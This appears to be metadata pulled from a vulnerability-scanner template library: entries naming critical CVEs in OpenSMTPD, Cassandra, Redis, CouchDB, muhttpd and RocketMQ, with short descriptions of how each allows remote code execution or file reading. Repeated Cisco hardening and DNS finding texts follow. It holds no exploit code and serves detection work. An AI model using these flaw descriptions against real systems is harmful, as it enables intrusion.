{"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-7247.yaml"}
{"ID":"CVE-2021-44521","Info":{"Name":"Apache Cassandra Load UDF RCE","Severity":"critical","Description":"When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.","Classification":{"CVSSScore":"9.1"}},"file_path":"network/cves/2021/CVE-2021-44521.yaml"}
{"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The\nvulnerability was introduced by Debian and Ubuntu Redis packages that\ninsufficiently sanitized the Lua environment. The maintainers failed to\ndisable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2022/CVE-2022-0543.yaml"}
{"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2022/CVE-2022-0543.yaml"}
{"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"}
{"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2022/CVE-2022-31793.yaml"}
{"ID":"CVE-2023-33246","Info":{"Name":"RocketMQ \u003c= 5.1.0 - Remote Code Execution","Severity":"critical","Description":"For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2023/CVE-2023-33246.yaml"}
description:ElasticBeanstalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical
name (CNAME) in the Domain Name System (DNS), but no host is providing content for it.
description:ElasticBeanstalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical name (CNAME) in the Domain Name System (DNS), but no host is providing content for it.
description:A DNS ServFail error occurred. ServFail errors occur when there is an error communicating with a DNS server. This could have a number of causes, including an error on the DNS server itself, or a temporary
networking issue.
description:A DNS ServFail error occurred. ServFail errors occur when there is an error communicating with a DNS server. This could have a number of causes, including an error on the DNS server itself, or a temporary networking issue.
The configuration for service timestamps on Cisco devices was not implemented for debugging purposes. It's important to note that timestamps can be added to either debugging or logging messages independently.
The configuration for service timestamps on Cisco devices was not implemented for debugging purposes. It's important to note that timestamps can be added to either debugging or logging messages independently.
Cisco IP source-route functionality has been utilized in several attacks. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
Cisco IP source-route functionality has been utilized in several attacks. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation:Disable IP source-route where appropriate.
Cisco PAD service has proven vulnerable to attackers. To reduce the risk of unauthorized access, organizations should implement a security policy restricting or disabling unnecessary access.
Cisco PAD service has proven vulnerable to attackers. To reduce the risk of unauthorized access, organizations should implement a security policy restricting or disabling unnecessary access.
To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
Cisco set and secure password functionality is recommended to control privilege level access. To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command.
Cisco set and secure password functionality is recommended to control privilege level access. To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command.